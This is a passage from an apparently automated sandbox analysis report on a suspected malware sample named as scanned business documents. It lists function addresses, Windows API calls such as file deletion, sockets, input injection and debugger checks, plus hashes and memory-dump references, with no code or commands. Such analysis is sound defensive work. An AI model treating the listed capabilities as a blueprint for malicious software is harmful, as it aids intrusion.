                                                      • Instruction ID: 26b2658a2ecf8f8dcdf934eaea3f87809504684f26ed991fb1ded377030708ac
                                                      • Opcode Fuzzy Hash: 9c051db06c40a08a81aec14532bb3c146a1dff7735d1b32e78106f0b1fb0b172
                                                      • Instruction Fuzzy Hash: 924191356011009FD711DF68C4D8B6ABBE9BF4A318F198598E8568F2D6C771EC81CBE1
                                                      Function 002ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                        • Part of subcall function 002EE199: GetFileAttributesW.KERNEL32(?,002ECF95), ref: 002EE19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002ED420
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 002ED470
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002ED481
                                                      • FindClose.KERNEL32(00000000), ref: 002ED498
                                                      • FindClose.KERNEL32(00000000), ref: 002ED4A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: c2cc1dc8710e1b25e76a5e2b7c094aa8127bcd455a0a596a66e4f2f2bb9fcf15
                                                      • Instruction ID: 2171147fb5794772c2d701ad685208b2f05013cab5fdb8272f14d170fa34a800
                                                      • Opcode Fuzzy Hash: c2cc1dc8710e1b25e76a5e2b7c094aa8127bcd455a0a596a66e4f2f2bb9fcf15
                                                      • Instruction Fuzzy Hash: E8317E350693859BC705FF64D8918AFB7A8AEA5300F844E1DF4D1921D1EB30AA29CB63
                                                      Function 002BE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: a86cb3f9b11c659dffd8a300eaafd66be8033d07087d3f36868239aa2c97e41f
                                                      • Instruction ID: 8ee9f7fa905e0e3999d132048750794df10976ad54608bd6d528e09695221345
                                                      • Opcode Fuzzy Hash: a86cb3f9b11c659dffd8a300eaafd66be8033d07087d3f36868239aa2c97e41f
                                                      • Instruction Fuzzy Hash: AFC27B71E286298FDF65CE28CD407EAB7B9EB48344F1541EAD80DE7241E774AE918F40
                                                      Function 002F648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 002F64DC
                                                      • CoInitialize.OLE32(00000000), ref: 002F6639
                                                      • CoCreateInstance.OLE32(0031FCF8,00000000,00000001,0031FB68,?), ref: 002F6650
                                                      • CoUninitialize.OLE32 ref: 002F68D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: c5ebbbd117b9fdbe2c285276290a7f96cc71dc121304276af0f9b5ae41514cd4
                                                      • Instruction ID: b518c051cd3de7703a8afb399fe00d471df8ca0c8cd82d08008103bc27cefa06
                                                      • Opcode Fuzzy Hash: c5ebbbd117b9fdbe2c285276290a7f96cc71dc121304276af0f9b5ae41514cd4
                                                      • Instruction Fuzzy Hash: D6D18B71518301AFD304EF24C88596BB7E8FF98344F50492DF5959B2A1EB30ED59CBA2
                                                      Function 003022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 003022E8
                                                        • Part of subcall function 002FE4EC: GetWindowRect.USER32(?,?), ref: 002FE504
                                                      • GetDesktopWindow.USER32 ref: 00302312
                                                      • GetWindowRect.USER32(00000000), ref: 00302319
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00302355
                                                      • GetCursorPos.USER32(?), ref: 00302381
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003023DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: 7f0f656cd542cf7bb4e14794f2cc2f3ce22a7ac1b3e8180031aa38bb427982c3
                                                      • Instruction ID: c78baca2639288e07f19ee68a9d39a654240df4636df1883d35f7ecf84469133
                                                      • Opcode Fuzzy Hash: 7f0f656cd542cf7bb4e14794f2cc2f3ce22a7ac1b3e8180031aa38bb427982c3
                                                      • Instruction Fuzzy Hash: 8631EE72545315AFCB22DF15C849B9BBBEEFF88310F005A19F98597191DB34EA08CB92
                                                      Function 002F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 002F9B78
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 002F9C8B
                                                        • Part of subcall function 002F3874: GetInputState.USER32 ref: 002F38CB
                                                        • Part of subcall function 002F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F3966
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 002F9BA8
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002F9C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 9d603fe8fcb4d07372d8af1d1d95b217490a14da2d308ca8972359584e11de0c
                                                      • Instruction ID: d92ee73d6ef120bf9b4e2fcdcc60b683e95246e7fd8f9674341677d14bcd847f
                                                      • Opcode Fuzzy Hash: 9d603fe8fcb4d07372d8af1d1d95b217490a14da2d308ca8972359584e11de0c
                                                      • Instruction Fuzzy Hash: 0241817196120E9FDF15EF64C845BFEBBB8EF09350F144066E905A2191EB309EA5CF60
                                                      Function 0029997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00299A4E
                                                      • GetSysColor.USER32(0000000F), ref: 00299B23
                                                      • SetBkColor.GDI32(?,00000000), ref: 00299B36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Color$LongProcWindow
                                                      • String ID:
                                                      • API String ID: 3131106179-0
                                                      • Opcode ID: e8eac789b54caa9f9636b8144910bc3d341d18ce66ae23a292a9e660958946b5
                                                      • Instruction ID: 0bd32a59ef20589d58147e3a5c61df9aff5d81360668709f062ae561a1cee1b5
                                                      • Opcode Fuzzy Hash: e8eac789b54caa9f9636b8144910bc3d341d18ce66ae23a292a9e660958946b5
                                                      • Instruction Fuzzy Hash: 9EA12970138505BFEF299E3C8C98FBB269DDB46320F14410EF402CA6A1DA69DDB1C272
                                                      Function 00301806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0030304E: inet_addr.WSOCK32(?), ref: 0030307A
                                                        • Part of subcall function 0030304E: _wcslen.LIBCMT ref: 0030309B
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0030185D
                                                      • WSAGetLastError.WSOCK32 ref: 00301884
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 003018DB
                                                      • WSAGetLastError.WSOCK32 ref: 003018E6
                                                      • closesocket.WSOCK32(00000000), ref: 00301915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: 30e1f5d0907fe9eed1d2beb091b96cfc574a0c2363533cd7446f1fd6f4a2e374
                                                      • Instruction ID: 1452d691151faf7aaa8cd265a00ef08ea5c5bbe3baa6636e61b4167c9de4b878
                                                      • Opcode Fuzzy Hash: 30e1f5d0907fe9eed1d2beb091b96cfc574a0c2363533cd7446f1fd6f4a2e374
                                                      • Instruction Fuzzy Hash: 3851E275A10200AFEB11AF24C8D6F6A77E5AB48718F18C098FA065F3D3C770AD51CBA1
                                                      Function 00311C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: ac5df2a580703db0292422df3ca5dd867d3001f09c09cfb0ae6671a4bc8380b1
                                                      • Instruction ID: df03fa609f1f3223bc35ebc7bdbb33973097162aaed0089991e1d25b69e11c7a
                                                      • Opcode Fuzzy Hash: ac5df2a580703db0292422df3ca5dd867d3001f09c09cfb0ae6671a4bc8380b1
                                                      • Instruction Fuzzy Hash: B021D3317802005FD72A8F2AD844BEA7BA9EF9D314F198068E9468B351CB71DC82CBD0
                                                      Function 00288060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 77396398e89c17cc5b5f69b87e5e054c3dab6fac2aac0e0f9478db3d41920a24
                                                      • Instruction ID: 3aa90667b6bddb7fe9cf0f6df2f4cc5ad08d2008ab678747d2d7752ee0a4ffea
                                                      • Opcode Fuzzy Hash: 77396398e89c17cc5b5f69b87e5e054c3dab6fac2aac0e0f9478db3d41920a24
                                                      • Instruction Fuzzy Hash: 5CA2B475E2122ACBDF24DF58C844BADB7B1BF44310F64829AD815A7284EB74DDA1CF90
                                                      Function 002E8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002E82AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($tb4$|
                                                      • API String ID: 1659193697-3947300831
                                                      • Opcode ID: 491da48455d83366f8e82f329ee61c21aa17e3d849095e6506f777440ff6e094
                                                      • Instruction ID: aec9db0f072001218d9e58aa9fe92784346911e6c851fd45d200b66380686c66
                                                      • Opcode Fuzzy Hash: 491da48455d83366f8e82f329ee61c21aa17e3d849095e6506f777440ff6e094
                                                      • Instruction Fuzzy Hash: C7324874A507469FCB28CF1AC48196AB7F0FF48710B55C46EE49ADB3A1EB70E951CB40
                                                      Function 0030A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0030A6AC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0030A6BA
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0030A79C
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030A7AB
                                                        • Part of subcall function 0029CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,002C3303,?), ref: 0029CE8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: 06049ea181f490444fb3d40d519a89c305659f020e812692972423d2066265a6
                                                      • Instruction ID: f3448cb28bba9ec28844aafb269c820057d634d3ba1af10b9c567b3ee29176f4
                                                      • Opcode Fuzzy Hash: 06049ea181f490444fb3d40d519a89c305659f020e812692972423d2066265a6
                                                      • Instruction Fuzzy Hash: CA517B75519300AFD710EF24D886A6BBBE8FF89754F00892DF585972A2EB30D914CF92
                                                      Function 002EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 002EAAAC
                                                      • SetKeyboardState.USER32(00000080), ref: 002EAAC8
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 002EAB36
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 002EAB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: ab3ad3fa664fcd274677d24d5b8e7ad119533422b726e566522bf56d802668b2
                                                      • Instruction ID: 6fe8a27e012dbb910d058f6b3e780ed2ae868341482dd0c9b59f247142144125
                                                      • Opcode Fuzzy Hash: ab3ad3fa664fcd274677d24d5b8e7ad119533422b726e566522bf56d802668b2
                                                      • Instruction Fuzzy Hash: BE312E30AE0285AEFB318F66CC057FA77A6AB64314F84421EF181951D0D374A9A5C762
                                                      Function 002BBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 002BBB7F
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • GetTimeZoneInformation.KERNEL32 ref: 002BBB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,?,0035121C,000000FF,?,0000003F,?,?), ref: 002BBC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00351270,000000FF,?,0000003F,?,?,?,0035121C,000000FF,?,0000003F,?,?), ref: 002BBC36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                      • String ID:
                                                      • API String ID: 806657224-0
                                                      • Opcode ID: 0a9d777f7ca08faa2baf673c5bbe8255870f96b26631ec83c8cd2540cb55055e
                                                      • Instruction ID: 0e46c67d0908f02d2d50507c75438cc897ec3cce4dbe535d9d6a7e5fe2dff073
                                                      • Opcode Fuzzy Hash: 0a9d777f7ca08faa2baf673c5bbe8255870f96b26631ec83c8cd2540cb55055e
                                                      • Instruction Fuzzy Hash: EC31C070954245EFCB12DF68CC809ADBBB8BF45390F144AAAE450D72B1D7B09E50CB50
                                                      Function 002FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 002FCE89
                                                      • GetLastError.KERNEL32(?,00000000), ref: 002FCEEA
                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 002FCEFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorEventFileInternetLastRead
                                                      • String ID:
                                                      • API String ID: 234945975-0
                                                      • Opcode ID: fb5a59310e5c03268f791ec94a58f0700d29a95f0e2299881569548309ce1ec1
                                                      • Instruction ID: f0da9aa8de4d41a936219bcc66c79d899a3172410dd08a32b34e7b4eddb075a6
                                                      • Opcode Fuzzy Hash: fb5a59310e5c03268f791ec94a58f0700d29a95f0e2299881569548309ce1ec1
                                                      • Instruction Fuzzy Hash: 7A21AEB156030E9BDB20DF65CA44BA6B7FCEB50794F20882AE64692151E770E9158B50
                                                      Function 002F5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002F5CC1
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002F5D17
                                                      • FindClose.KERNEL32(?), ref: 002F5D5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 5ddbb01b26be2c8fbfae984c10e2d84c024b0558bd74215c141472a6452feb94
                                                      • Instruction ID: 7d8c907701645f2b41dc0567ddbbc84c50bf68ad5fef0763f4ffa50d5ec654f2
                                                      • Opcode Fuzzy Hash: 5ddbb01b26be2c8fbfae984c10e2d84c024b0558bd74215c141472a6452feb94
                                                      • Instruction Fuzzy Hash: 89519A346146069FC714DF28C494AA6F7E4FF0A314F14856EEA5A8B3A1CB30EC25CF91
                                                      Function 002B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 002B271A
